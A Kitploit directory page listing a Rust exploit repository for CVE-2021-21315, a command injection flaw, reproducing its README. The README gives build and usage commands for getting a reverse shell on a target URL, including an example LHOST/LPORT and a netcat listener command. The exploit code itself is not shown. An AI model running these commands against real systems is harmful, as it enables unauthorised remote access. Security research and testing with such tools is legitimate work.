Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-21315 — rust noob tried write easy exploit code with rust lang | Kitploit
Tools/GitHubGitHub/g01d3nw01f/cve-2021-21315
Payload GenerationExploitationWeb Application ExploitationCommand and ControlLearning & EducationRemote Access Tool
GitHubg01d3nw01f/cve-2021-21315

CVE-2021-21315

rust noob tried write easy exploit code with rust lang

View Repository
124 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

the CVE-2021-21315's exploit code wrote with Rust lang

I'm rust noob so this code was my part of RustLang practices

Yes!!Let's Get the reverse shell!!!!!!!!!!

[!]for education or researching only

Build

root@kitploit:~
cargo build

Usage

root@kitploit:~
./exploit <targetURL/path/of/api> <LHOST> <LPORT>

./exploit http://target.com/api/osinfo?param 172.17.2.1 1234   

need Netcat for Listener to catch reverse shell

root@kitploit:~

nc -nlvp <lport>
nc -nlvp 1234

alt text

Download Tool